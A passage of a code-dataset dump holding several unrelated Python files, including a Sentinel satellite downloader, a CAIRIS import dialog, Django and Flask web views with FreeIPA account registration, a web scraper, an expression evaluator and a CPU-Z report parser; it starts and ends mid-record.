return dt\n\n# ------------------------------------------------------------------------------ \ndef parse_options(options): \n # check options\n if options.footprint == '':\n raise Exception(\"no footprint selected, use --fprint option\")\n\n if options.date_from=='' and options.date_to!='': options.date_from=options.date_to\n if options.date_to=='' and options.date_from!='': options.date_to=options.date_from\n\n if options.date_from=='' and options.date_to!='': options.date_from=options.date_to\n\n # set parameters\n par = default_param()\n \n if options.sensor_operational_mode!='': par['req']['sensoroperationalmode'] = options.sensor_operational_mode\n if options.product_type!='': par['req']['producttype'] = options.product_type\n if options.platform_name!='': par['req']['platformname'] = options.platform_name\n if options.polarisation_mode!='': par['req']['polarisationmode'] = options.polarisation_mode\n if options.relative_orbit!='': par['req']['relativeorbitnumber'] = options.relative_orbit\n if options.absolute_orbit!='': par['req']['orbitnumber'] = options.absolute_orbit\n if options.logfile!='': par['logfile'] = options.logfile\n\n if options.user!='':\n par['user'] = options.user\n else:\n raise Exception(\"no username provided, use --user option\")\n\n if options.password!='':\n par['pass'] = options.password\n else:\n raise Exception(\"no username provided, use --pass option\")\n \n if options.url!='': par['url'] = options.url\n\n if options.logfile!='': par['logfile'] = options.logfile\n\n if options.root_dir!='': 
par['root_dir'] = options.root_dir\n par['make_sub_dir'] = options.make_sub_dir\n\n if options.footprint!='':\n latlon = options.footprint.strip().split(':')\n \n latlon1 = latlon[0].strip().split(',')\n latlon2 = latlon[1].strip().split(',')\n \n lat1 = latlon1[0].strip()\n lon1 = latlon1[1].strip()\n\n lat2 = latlon2[0].strip()\n lon2 = latlon2[1].strip()\n\n par['req']['footprint'] = '\"Intersects(POLYGON((%(lon1)s %(lat1)s,%(lon2)s %(lat1)s,%(lon2)s %(lat2)s,%(lon1)s %(lat2)s,%(lon1)s %(lat1)s)))\"'%{'lon1':lon1,'lat1':lat1,'lon2':lon2,'lat2':lat2}\n\n # date-time\n if options.date_from!='':\n dt_from = parse_date(options.date_from)\n dt_to = parse_date(options.date_to,midnight=True)\n \n par['req']['beginPosition'] = '['+dt_from.strftime('%Y-%m-%dT%H:%M:%S')+dt_from.strftime('.%f')[:4]+'Z TO '+dt_to.strftime('%Y-%m-%dT%H:%M:%S')+dt_to.strftime('.%f')[:4]+'Z]'\n\n return par\n\n# ======================================================================\n# Simple search query: https://scihub.copernicus.eu/twiki/do/view/SciHubUserGuide/3FullTextSearch\n\n# Parsing command line\nif __name__==\"__main__\":\n\n # Parse command line\n command_line_parser = optparse.OptionParser()\n\n command_line_parser.add_option(\"--date_from\", \"-f\", dest=\"date_from\", default = 'NOW-1',\n help=\"Request from date: YYYYMMDD, YYYYMMDDTHHMMSS, NOW, NOW-xdays\")\n\n command_line_parser.add_option(\"--date_to\", \"-t\", dest=\"date_to\", default = 'NOW',\n help=\"Request to date: YYYYMMDD (will be the end of day), YYYYMMDDTHHMMSS, NOW, NOW-xdays\")\n\n command_line_parser.add_option(\"--dir\",\"-d\", dest=\"root_dir\", default = './',\n help=\"Main directory of archive (root_dir/yyyy/mm/dd/*)\")\n\n command_line_parser.add_option(\"--make_subdir\",\"-s\", dest=\"make_sub_dir\", action=\"store_true\",\n help=\"Add subdirectory (../yyyy/mm/dd/*)\",\n default=False)\n\n command_line_parser.add_option(\"--plat\",\"-l\", dest=\"platform_name\", default = 'Sentinel-3',\n help=\"Platform name: Sentinel-1, Sentinel-2, Sentinel-3\")\n\n command_line_parser.add_option(\"--prod\",\"-x\", dest=\"product_type\", default = 'OL_2_WFR*',\n help=\"Product type: OL_2_WFR*, OL_1_EFR*, SL_1_RBT*, SL_2_WST*, SLC, GRD, OCN etc\")\n\n command_line_parser.add_option(\"--mode\",\"-m\", dest=\"sensor_operational_mode\", default = '',\n help=\"Sensor operational mode: SM,IW,EW,WV \")\n\n command_line_parser.add_option(\"--pol\",\"-o\", dest=\"polarisation_mode\", default = '',\n help=\"Sensor polarisation mode: HH,VV,HV,VH \")\n\n command_line_parser.add_option(\"--relorb\",\"-r\", dest=\"relative_orbit\", default = '',\n help=\"Relative orbit number: NN, 'NN_0 TO NN_1' \")\n\n command_line_parser.add_option(\"--absorb\",\"-b\", dest=\"absolute_orbit\", default = '',\n help=\"Absolute orbit number: NN, 'NN_0 TO NN_1' \")\n\n command_line_parser.add_option(\"--fprint\",\"-i\", dest=\"footprint\", default = '',\n help=\"Image footprint: lat1,lon1:lat2,lon2 \")\n\n command_line_parser.add_option(\"--logfile\",\"-z\", dest=\"logfile\",\n default=\"Download_log\",\n help=\"Log file\")\n \n command_line_parser.add_option(\"--pass\", \"-p\", dest=\"password\",\n default=\"\",\n help=\"Password\")\n \n command_line_parser.add_option(\"--user\", \"-n\", dest=\"user\",\n default=\"\",\n help=\"Username\")\n\n command_line_parser.add_option(\"--url\", \"-u\", dest=\"url\",\n default=\"\",\n help=\"Username\")\n \n options,arguments = 
command_line_parser.parse_args()\n\n#-------------------------------------------------------------------------------\n#-main----\nif __name__ == \"__main__\":\n # ---------------------------------------------------------------------------\n # parse options\n par = parse_options(options)\n logfile = par[\"logfile\"]+\"_\"+datetime.now().strftime('%Y%m%d_%H%M%S')+\".log\"\n \n # set file logger\n try:\n if os.path.exists(logfile):\n os.remove(logfile)\n logging.basicConfig(filename=logfile,level=logging.INFO)\n print(\"Logging to: \"+logfile)\n except:\n raise Exception(\"Failed to set logger\")\n\n # off we go\n entries = process_request(par,logging)\n\n if entries:\n download_files(par,entries,logging)\n\n logging.info(\"Done\")\n\n#-EOF\n","sub_path":"Auto_downloaders/Universal_Sentinel_Downloader.py","file_name":"Universal_Sentinel_Downloader.py","file_ext":"py","file_size_in_byte":15731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"54355523","text":"# Licensed to the Apache Software Foundation (ASF) under one\n# or more contributor license agreements. See the NOTICE file\n# distributed with this work for additional information\n# regarding copyright ownership. The ASF licenses this file\n# to you under the Apache License, Version 2.0 (the\n# \"License\"); you may not use this file except in compliance\n# with the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing,\n# software distributed under the License is distributed on an\n# \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the\n# specific language governing permissions and limitations\n# under the License.\n\n\nimport wx\nimport armid\nimport os\nimport ARM\nfrom Borg import Borg\nfrom VulnerabilityParameters import VulnerabilityParameters\nfrom ThreatParameters import ThreatParameters\nfrom DirectoryEntryDialog import DirectoryEntryDialog\nimport ObjectFactory\n\nclass DirectoryDialog(wx.Dialog):\n def __init__(self,parent,dimensionName):\n wx.Dialog.__init__(self,parent,armid.DIRECTORYDIALOG_ID,'Import ' + dimensionName,style=wx.DEFAULT_DIALOG_STYLE|wx.MAXIMIZE_BOX|wx.THICK_FRAME|wx.RESIZE_BORDER,size=(600,400))\n b = Borg()\n self.dbProxy = b.dbProxy\n mainSizer = wx.BoxSizer(wx.VERTICAL)\n self.theSelectedIdx = -1\n self.theDimensionName = dimensionName\n self.entries = []\n self.typedEntries = []\n if (self.theDimensionName == 'vulnerability'):\n self.entries = self.dbProxy.getVulnerabilityDirectory() \n elif (self.theDimensionName == 'threat'):\n self.entries = self.dbProxy.getThreatDirectory() \n \n self.typeDictionary = {}\n for entry in self.entries:\n entryType = entry[3]\n if entryType not in self.typeDictionary:\n self.typeDictionary[entryType] = []\n self.typeDictionary[entryType].append(entry)\n typeBox = wx.StaticBox(parent,-1,'Type')\n comboSizer = wx.StaticBoxSizer(typeBox,wx.HORIZONTAL)\n mainSizer.Add(comboSizer,0,wx.EXPAND)\n typeNames = self.typeDictionary.keys()\n typeNames.sort()\n typeNames = [''] + typeNames\n self.typeCtrl = wx.ComboBox(self,armid.DIRECTORYDIALOG_COMBOTYPE_ID,\"\",choices=typeNames,size=wx.DefaultSize,style=wx.CB_READONLY)\n comboSizer.Add(self.typeCtrl,1,wx.EXPAND)\n\n self.entryList = wx.ListCtrl(self,armid.DIRECTORYDIALOG_LISTENTRIES_ID,style=wx.LC_REPORT)\n self.entryList.InsertColumn(0,'Label')\n self.entryList.InsertColumn(1,'Name')\n self.entryList.SetColumnWidth(0,200)\n self.entryList.SetColumnWidth(1,500)\n for idx,dirEntry in enumerate(self.entries):\n self.entryList.InsertStringItem(idx,dirEntry[0])\n self.entryList.SetStringItem(idx,1,dirEntry[1])\n mainSizer.Add(self.entryList,1,wx.EXPAND)\n self.typedEntries = self.entries\n\n buttonSizer = wx.BoxSizer(wx.HORIZONTAL)\n mainSizer.Add(buttonSizer,0,wx.CENTER)\n importButton = wx.Button(self,armid.DIRECTORYDIALOG_BUTTONIMPORT_ID,'Import')\n buttonSizer.Add(importButton)\n cancelButton = wx.Button(self,wx.ID_CANCEL,\"Cancel\")\n buttonSizer.Add(cancelButton)\n self.SetSizer(mainSizer)\n\n wx.EVT_LIST_ITEM_SELECTED(self.entryList,armid.DIRECTORYDIALOG_LISTENTRIES_ID,self.onItemSelected)\n wx.EVT_LIST_ITEM_DESELECTED(self.entryList,armid.DIRECTORYDIALOG_LISTENTRIES_ID,self.onItemDeselected)\n wx.EVT_LIST_ITEM_ACTIVATED(self.entryList,armid.DIRECTORYDIALOG_LISTENTRIES_ID,self.onItemActivated)\n 
wx.EVT_COMBOBOX(self.typeCtrl,armid.DIRECTORYDIALOG_COMBOTYPE_ID,self.onTypeSelected)\n wx.EVT_BUTTON(self,armid.DIRECTORYDIALOG_BUTTONIMPORT_ID,self.onImport)\n\n dimIconFile = dimensionName + '.png'\n dimIcon = wx.Icon(b.imageDir + '/' + dimIconFile,wx.BITMAP_TYPE_PNG)\n self.SetIcon(dimIcon)\n\n\n def onItemSelected(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n\n def onItemDeselected(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n\n def onImport(self,evt):\n if (self.theSelectedIdx == -1):\n errorString = 'No ' + self.theDimensionName + 's selected'\n errorLabel = 'Add ' + self.theDimensionName\n dlg = wx.MessageDialog(self,errorString,errorLabel,wx.OK) \n dlg.ShowModal()\n dlg.Destroy()\n return\n else:\n self.EndModal(armid.DIRECTORYDIALOG_BUTTONIMPORT_ID)\n\n def object(self): \n row = self.typedEntries[self.theSelectedIdx]\n p = None\n if (self.theDimensionName == 'vulnerability'):\n vulName = row[0]\n vulDesc = row[1] + '\\n\\n' + row[2]\n vulType = row[3]\n p = VulnerabilityParameters(vulName,vulDesc,vulType,[])\n else:\n thrName = row[0]\n thrMethod = row[1] + '\\n\\n' + row[2]\n thrType = row[3]\n p = ThreatParameters(thrName,thrType,thrMethod,[])\n return ObjectFactory.build(-1,p)\n\n def onItemActivated(self,evt):\n self.theSelectedIdx = evt.GetIndex()\n row = self.typedEntries[self.theSelectedIdx]\n dLabel = row[0]\n dName = row[1]\n dType = row[3]\n dDesc = row[2]\n dlg = DirectoryEntryDialog(self,dLabel,dName,dType,dDesc)\n dlg.ShowModal()\n dlg.Destroy()\n\n def onTypeSelected(self,evt):\n typeName = evt.GetString()\n self.entryList.DeleteAllItems()\n if (typeName == ''):\n self.typedEntries = self.entries\n else:\n self.typedEntries = self.typeDictionary[typeName]\n for idx,dirEntry in enumerate(self.typedEntries):\n self.entryList.InsertStringItem(idx,dirEntry[0])\n self.entryList.SetStringItem(idx,1,dirEntry[1])\n","sub_path":"cairis/cairis/DirectoryDialog.py","file_name":"DirectoryDialog.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"155789898","text":"from sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String\nfrom sqlalchemy.engine import create_engine\nfrom sqlalchemy.orm.session import sessionmaker\nimport subprocess\nimport os\nfrom config import *\n\n\n__all__ = ['Base', 'engine', 'Session', 'Service', 'setup']\n\n\nBase = declarative_base()\nengine = create_engine('sqlite:////usr/local/gentoo-chroot/var/gentoo-chroot.db', echo=False)\nSession = sessionmaker(bind=engine)\n\n\nclass Service(Base):\n __tablename__ = 'services'\n\n id = Column(Integer, primary_key=True)\n name = Column(String)\n launch_script = Column(String)\n status_command = Column(String)\n\n def start(self):\n with open(os.devnull, 'w') as devnull:\n status = not subprocess.call(['chroot', chroottarget, '/bin/bash', '-c', self.launch_script + ' start'], stdin=devnull, stdout=devnull, stderr=devnull, env={'PATH': env_path})\n return status\n\n def stop(self):\n with open(os.devnull, 'w') as devnull:\n status = not subprocess.call(['chroot', chroottarget, '/bin/bash', '-c', self.launch_script + ' stop'], stdin=devnull, stdout=devnull, stderr=devnull, env={'PATH': env_path})\n return status\n\n @property\n def status(self):\n with open(os.devnull, 'w') as devnull:\n status = not subprocess.call(['chroot', chroottarget, '/bin/bash', '-c', self.status_command], stdin=devnull, stdout=devnull, stderr=devnull, env={'PATH': env_path})\n return status\n\n\ndef setup():\n Base.metadata.create_all(engine)\n","sub_path":"spk/gentoo-chroot/src/app/application/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"98198114","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 20 22:08:55 2017\n\n@author: katsuhisa\n\"\"\"\n\nimport os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom sklearn import svm\nfrom sklearn.decomposition import PCA\nfrom scipy import stats\n\n\n# change path to the data directory\nos.chdir(r'C:\\Users\\katsuhisa\\Dropbox\\spikefinder\\spikefinder.train\\spikefinder.train')\n\ndata_all = ['1','2','3','4','5','6','7','8','9','10']\ndata_V1 = ['1','2','3','5','6','7','8','9','10']\ndata_ret = '1'\n\n\ndef plot(calcium, spikes, panel):\n x = np.arange(len(calcium)) / 100.0\n #plt.figure(figsize=(15, 3))\n plt.plot(x, calcium, color=(.1, .6, .4))\n plt.plot(x, spikes / 2.0 - 1, color='k')\n plt.yticks([])\n plt.ylim([-2., 4.])\n plt.xlim(panel)\n plt.grid()\n \n \ndef pca95(datanumber):\n calcium_train = pd.read_csv(datanumber + '.train.calcium.csv')\n pca = PCA()\n pca.fit(calcium_train)\n return pca\n \n\n \n \n \n# plot all the traces with tag-names\nfig = plt.figure()\nsubp = 1\nfor d in data_V1:\n calcium_train = pd.read_csv(d + '.train.calcium.csv')\n spikes_train = pd.read_csv(d + '.train.spikes.csv')\n\n fig.add_subplot(len(data_V1),1,subp)\n plot(calcium_train['1'], spikes_train['1'], [0, 100])\n \n if d != '10':\n plt.tick_params(\n axis='x',\n which='both',\n bottom='off',\n top='off',\n labelbottom='off')\n subp += 1\n \nplt.show()\n\npca95('1')\n ","sub_path":"try.py","file_name":"try.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"558538737","text":"from datetime import datetime\nfrom django.http import Http404\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.views.generic import ListView, TemplateView\nfrom organisations.models import Organisation\n\n\nclass SupportedOrganisationsView(ListView):\n template_name = \"organisations/supported_organisations.html\"\n queryset = Organisation.objects.all().order_by(\"organisation_type\", \"common_name\")\n\n\nclass OrganisationsFilterView(TemplateView):\n template_name = \"organisations/organisation_filter.html\"\n\n def get_context_data(self, **kwargs):\n orgs = Organisation.objects.all().filter(**kwargs)\n if not orgs.exists():\n raise Http404()\n\n paginator = Paginator(orgs, 100) # Show 100 records per page\n page = self.request.GET.get(\"page\")\n context = {\"context_object_name\": \"organisation\"}\n try:\n context[\"objects\"] = paginator.page(page)\n except PageNotAnInteger:\n # If page is not an integer, deliver first page.\n context[\"objects\"] = paginator.page(1)\n except EmptyPage:\n # If page is out of range, deliver last page of results.\n context[\"objects\"] = paginator.page(paginator.num_pages)\n\n return context\n\n\nclass OrganisationDetailView(TemplateView):\n template_name = \"organisations/organisation_detail.html\"\n\n def get_context_data(self, **kwargs):\n kwargs[\"date\"] = datetime.strptime(kwargs[\"date\"], \"%Y-%m-%d\").date()\n try:\n obj = Organisation.objects.all().get_by_date(**kwargs)\n except Organisation.DoesNotExist:\n raise Http404()\n\n context = {\n \"object\": obj,\n \"api_detail\": obj.get_url(\"api:organisation-detail\"),\n \"context_object_name\": \"organisation\",\n }\n if obj.get_geography(kwargs[\"date\"]):\n context[\"api_detail_geo\"] = obj.get_url(\"api:organisation-geo\", \"json\")\n return context\n","sub_path":"every_election/apps/organisations/views/public.py","file_name":"public.py","file_ext":"py","file_size_in_byte":1982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"470069529","text":"import io\n\nfrom jeffy.framework import get_app\n\napp = get_app()\n\n\n@app.handlers.common()\ndef common_example(event, context):\n \"\"\"Common handler example.\"\"\"\n return event\n\n\n@app.handlers.s3()\ndef s3_example(event, context):\n \"\"\"Common handler example.\"\"\"\n return event\n\n\ndef test_common():\n \"\"\"Common handler test.\"\"\"\n assert common_example({'foo': 'bar'}, {}) == {'foo': 'bar'}\n\n\ndef test_s3(mocker):\n \"\"\"S3 handler test.\"\"\"\n m = mocker.Mock()\n m.get_object = mocker.Mock(return_value={\n 'Metadata': {'foo': 'bar'},\n 'Body': io.StringIO('buz')\n })\n s3m = mocker.Mock()\n s3m.get_resource = mocker.Mock(return_value=m)\n mocker.patch('jeffy.sdk.s3.S3').return_value = s3m\n assert s3_example({'Records': [\n {'s3': {\n 'bucket': {'name': 'bucket_name'},\n 'object': {'key': 'object_key'}\n }}\n ]}, {}) == [{\n 'key': 'object_key',\n 'bucket_name': 'bucket_name',\n 'body': 'buz',\n 'metadata': {'foo': 'bar'}\n }]\n","sub_path":"tests/integration_test.py","file_name":"integration_test.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"158404024","text":"import sys\nimport json\n\nif len(sys.argv) < 2:\n print(\"Please provide a config file\")\n sys.exit()\n\nconfigOptions = None\nconfigFileName = sys.argv[1]\n\n'''\n Getting the configuration options from the config file\n'''\n\ndef getConfig():\n\n global configOptions\n\n if configOptions is None:\n try:\n with open(configFileName, \"r\") as readFile:\n configOptions = json.load(readFile)\n return configOptions\n except Exception as e:\n raise Exception(\"Cannot read the config file\")\n\n else:\n return configOptions\n","sub_path":"app/utils/configReader.py","file_name":"configReader.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"260176757","text":"from django import urls\nfrom django.urls import path\nfrom newwebsite.views import (\n home_list_view,\n post_detail_view,\n category_list_view,\n search_list_view,\n about_us_list_view,\n privacy_policy_list_view,\n terms_and_conditions_list_view,\n)\n\n\nurlpatterns = [\n path('', home_list_view, name='home'),\n path('download//', post_detail_view, name='post-details'), \n path('category//', category_list_view, name='category'),\n path('about_us/', about_us_list_view, name='about'),\n path('privacy_policy/', privacy_policy_list_view, name='privacy_policy'),\n path('terms_and_conditions/', terms_and_conditions_list_view, name='Ts&Cs'),\n path('search/', search_list_view, name='search'),\n \n]","sub_path":"newwebsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":718,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"468286610","text":"from urllib.request import urlopen\r\nfrom bs4 import BeautifulSoup\r\nimport pandas as pd\r\n\r\nhtml = urlopen(\"https://www.flipkart.com/mens-watches-store?otracker=nmenu_sub_Men_0_Watches\")\r\nsoup = BeautifulSoup(html,'lxml')\r\ndabba = soup.find_all('div', class_='_3liAhj _2Vsm67')\r\n\r\nname=[]\r\nprice=[]\r\nrating=[]\r\nfor i in dabba:\r\n n = i.find('a',class_='_2cLu-l')\r\n if n is None:\r\n name.append('NaN')\r\n else:\r\n name.append(n.text)\r\n p = i.find('div',class_='_1vC4OE')\r\n if p is None:\r\n price.append('NaN')\r\n else:\r\n price.append(p.text)\r\n r = i.find('div',class_='hGSR34')\r\n if r is None:\r\n rating.append('NaN')\r\n else:\r\n rating.append(r.text)\r\n\r\nwpname=[]\r\nwpprice=[]\r\nwprating=[]\r\nfor x in name:\r\n wpname.append(x)\r\nfor x in price:\r\n wpprice.append(x)\r\nfor x in rating:\r\n wprating.append(x)\r\nprint(wpname)\r\nprint(wpprice)\r\nprint(wprating)\r\n\r\ndf = pd.DataFrame({'name':wpname, 'price':wpprice, 'rating':wprating})\r\nprint(df)","sub_path":"men.py","file_name":"men.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"631928229","text":"# future must be first\nfrom __future__ import division\nimport operator\n\nimport numpy as np\n\n\nclass EvalTerm(object):\n \"\"\"\n Base class for evaluation\n \"\"\"\n\n def __init__(self, tokens):\n self.value = tokens[0]\n\n def operator_operands(self, tokenlist):\n \"generator to extract operators and operands in pairs\"\n it = iter(tokenlist)\n while 1:\n try:\n yield (it.next(), it.next())\n except StopIteration:\n break\n\n def operation(self, op, result, val):\n return self.operations[op](result, val)\n\n\n\nclass EvalConstant(EvalTerm):\n \"\"\"\n Class to evaluate a parsed constant or variable\n \"\"\"\n\n def _eval(self, row):\n try:\n np.float64(self.value)\n return self.value\n except ValueError:\n return row[self.value]\n\n\nclass EvalString(EvalTerm):\n \"\"\"\n Class to evaluate a parsed string.\n \"\"\"\n\n def _eval(self, row):\n return self.value\n\n\nclass EvalSignOp(EvalTerm):\n \"\"\"\n Class to evaluate expressions with a leading + or - sign\n \"\"\"\n\n def __init__(self, tokens):\n self.sign, self.value = tokens[0]\n\n def _eval(self, row):\n mult = {'+':1, '-':-1}[self.sign]\n return mult * self.value._eval(row)\n\n\nclass EvalBinaryArithOp(EvalTerm):\n \"\"\"\n Class for evaluating binary arithmetic operations\n \"\"\"\n\n operations = {\n '+': operator.__add__,\n '-': operator.__sub__,\n '*': operator.__mul__,\n '/': operator.__truediv__,\n '^': operator.__pow__,\n }\n\n def _eval(self, row):\n result = np.float64(self.value[0]._eval(row))\n for op, val in self.operator_operands(self.value[1:]):\n val = np.float64(val._eval(row))\n result = self.operation(op, result, val)\n if np.isinf(result):\n return np.nan\n return result\n\n\nclass EvalMultOp(EvalBinaryArithOp):\n \"\"\"\n Class to distinguish precedence of multiplication/division expressions\n \"\"\"\n pass\n\n\nclass EvalPlusOp(EvalBinaryArithOp):\n \"\"\"\n Class to distinguish precedence of addition/subtraction expressions\n \"\"\"\n pass\n\n\nclass EvalExpOp(EvalBinaryArithOp):\n \"\"\"\n Class to distinguish precedence of exponentiation expressions\n \"\"\"\n pass\n\n\nclass EvalComparisonOp(EvalTerm):\n \"\"\"\n Class to evaluate comparison expressions\n \"\"\"\n\n opMap = {\n \"<\" : lambda a,b : a < b,\n \"<=\" : lambda a,b : a <= b,\n \">\" : lambda a,b : a > b,\n \">=\" : lambda a,b : a >= b,\n \"!=\" : lambda a,b : a != b,\n \"=\" : lambda a,b : a == b,\n }\n\n def _eval(self, row):\n val1 = np.float64(self.value[0]._eval(row))\n for op, val in self.operator_operands(self.value[1:]):\n fn = EvalComparisonOp.opMap[op]\n val2 = np.float64(val._eval(row))\n if not fn(val1, val2):\n break\n val1 = val2\n else:\n return True\n return False\n\n\nclass EvalNotOp(EvalTerm):\n \"\"\"\n Class to evaluate not expressions\n \"\"\"\n\n def __init__(self, tokens):\n self.value = tokens[0][1]\n\n def _eval(self, row):\n return not self.value._eval(row)\n\n\nclass EvalBinaryBooleanOp(EvalTerm):\n \"\"\"\n Class for evaluating binary boolean operations\n \"\"\"\n\n operations = {\n 'and': lambda p, q: p and q,\n 'or': lambda p, q: p or q,\n }\n\n def _eval(self, row):\n result = np.bool_(self.value[0]._eval(row))\n for op, val in self.operator_operands(self.value[1:]):\n val = np.bool_(val._eval(row))\n result = self.operation(op, result, val)\n return result\n\n\nclass EvalAndOp(EvalBinaryBooleanOp):\n \"\"\"\n Class to distinguish precedence of and expressions\n \"\"\"\n pass\n\n\nclass EvalOrOp(EvalBinaryBooleanOp):\n \"\"\"\n Class to distinguish precedence of or 
expressions\n \"\"\"\n pass\n\n\nclass EvalInOp(EvalTerm):\n \"\"\"\n Class to eval in expressions.\n \"\"\"\n\n def _eval(self, row):\n val_to_test = str(self.value[0]._eval(row))\n val_list = []\n for op, val in self.operator_operands(self.value[1:]):\n val_list.append(val._eval(row))\n return val_to_test in val_list\n","sub_path":"lib/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":4268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"594821698","text":"sections = ('CPU-Z TXT Report',\n 'Binaries',\n 'Processors',\n 'APICs',\n 'Timers',\n 'Processors Information',\n 'Thread dumps',\n 'BIOS',\n 'Chipset',\n 'Memory SPD',\n 'Monitoring',\n 'LPCIO',\n 'Hardware Monitors',\n 'PCI Devices',\n 'DMI',\n 'Storage',\n 'USB Devices',\n 'Graphics',\n 'Graphic APIs',\n 'Display Adapters',\n 'Software',\n 'Register Spaces')\n\nfile = open('test_cpuz.txt', 'r')\n\ni = 0\nold_line = ''\nsection = ''\n\nfor line in file: \n if line[0] == '-':\n section = str(old_line).strip()\n i+=1\n print('{:2} {}'.format(i, str(old_line).strip()))\n old_line = line\n \n if section == sections[2]:\n if len(line.strip()) == 0:\n continue\n\n key = str(line).split('\\t')[0]\n value = str(line).split('\\t')[-1:][0] \n value = str(value).replace('\\n', '')\n \n if key == 'Number of sockets':\n print(key, value)\n \n if key == 'Number of threads':\n print(key, value)\n \n","sub_path":"parsing_cpuz.py","file_name":"parsing_cpuz.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"228077163","text":"from app.accounts.models.user import UserSession\nfrom app.accounts.models.database import User\n\nfrom app.accounts.forms import LoginForm, EmailForm, RegisterForm\n\nfrom mail import mail\n\nfrom database import db\n\n\nfrom flask import (\n flash,\n request,\n render_template,\n Blueprint,\n redirect,\n url_for,\n Markup,\n current_app as app,\n)\n\nfrom flask_mail import Message\nfrom python_freeipa import Client, exceptions\nimport uuid\nimport paramiko\nimport re\nfrom flask_login import login_user, logout_user, current_user, login_required\n\n\naccounts_blueprint = Blueprint(\"accounts\", __name__, template_folder=\"templates\")\n\n\n@accounts_blueprint.route(\"/\")\ndef home():\n print(current_user)\n # Redirect users who are not logged in.\n if not current_user or current_user.is_anonymous:\n return redirect(url_for(\"accounts.login\"))\n return render_template(\"profile.html\")\n\n\n@accounts_blueprint.route(\"/login\", methods=[\"GET\", \"POST\"])\ndef login():\n form = LoginForm(request.form)\n if request.method == \"POST\" and form.validate():\n client = Client(\"ipa.freeside.co.uk\", verify_ssl=False, version=\"2.215\")\n try:\n uid = form.username.data\n client.login(uid, form.password.data)\n data = client.user_show(uid)\n login_user(UserSession(uid, data))\n flash(\"Logged in!\")\n return redirect(\"/\")\n except exceptions.Unauthorized:\n flash(\"Invalid username or password\")\n except exceptions.NotFound:\n flash(\"User not in database.\")\n return render_template(\"login.html\", form=form)\n\n\n@accounts_blueprint.route(\"/logout\")\n@login_required\ndef logout():\n logout_user()\n return redirect(\"/\")\n\n\n@accounts_blueprint.route(\"/join\", methods=[\"GET\", \"POST\"])\ndef register():\n form = EmailForm(request.form)\n if request.method == \"POST\" and form.validate():\n email = form.email.data\n if app.config[\"DEBUG\"] is False and \"hull.ac.uk\" not in email.split(\"@\")[1]:\n flash(\"Please enter a valid email, it should be your Uni email.\")\n else:\n user = User.query.filter_by(email=form.email.data).first()\n if user is None:\n uid = str(uuid.uuid4())\n user = User(email=form.email.data, uuid=uid)\n db.session.add(user)\n db.session.commit()\n\n msg = Message(\"Please verify your email!\", recipients=[form.email.data])\n msg.html = render_template(\"emails/verify.html\", uid=uid)\n with app.app_context():\n mail.send(msg)\n info_msg = Markup(\n \"Email sent this may take a while to arrive, \"\n \"Click the link in the activation email. \"\n \"If you can't find the email check your junk \"\n \"folder. If you have any issues please email \"\n \"support@freeside.co.uk or join our \"\n \"Discord.\"\n )\n return render_template(\"layout.html\", message=info_msg)\n else:\n info_msg = \"\"\n if user.account_created is True:\n info_msg = \"Account already exists!\"\n else:\n info_msg = Markup(\n \"Please click the link in the activation email. \"\n \"If you can't find the email check your junk \"\n \"folder. 
If you have any issues please email \"\n \"support@freeside.co.uk or join our \"\n \"Discord.\"\n )\n return render_template(\"layout.html\", message=info_msg)\n\n return render_template(\"join.html\", form=form)\n\n\n@accounts_blueprint.route(\"/verify/\", methods=[\"GET\", \"POST\"])\ndef verify_user(uid):\n form = RegisterForm(request.form)\n user = User.query.filter_by(uuid=uid).first_or_404()\n\n if request.method == \"POST\" and form.validate():\n client = Client(\"ipa.freeside.co.uk\", verify_ssl=False, version=\"2.215\")\n client.login(\"admin\", app.config[\"IPA_PASSWORD\"])\n username = user.email.split(\"@\")[0]\n firstname = form.first_name.data\n firstname = firstname.title()\n lastname = username.split(\".\")[-1].title()\n username = re.sub(\"[^a-zA-Z]+\", \"\", username)\n username = username.lower()\n\n try:\n ipauser = client.user_add(\n username,\n firstname,\n lastname,\n form.first_name.data + \" \" + lastname,\n display_name=form.display_name.data,\n mail=user.email,\n preferred_language=\"EN\",\n random_pass=True,\n )\n except exceptions.DuplicateEntry:\n flash(\"Account already exists.\")\n return render_template(\"layout.html\")\n print(ipauser[\"randompassword\"])\n client.change_password(username, form.password.data, ipauser[\"randompassword\"])\n user.account_created = True\n db.session.commit()\n\n createHomeDir(username)\n\n msg = Message(\"Welcome to Freeside\", recipients=[user.email])\n msg.html = render_template(\n 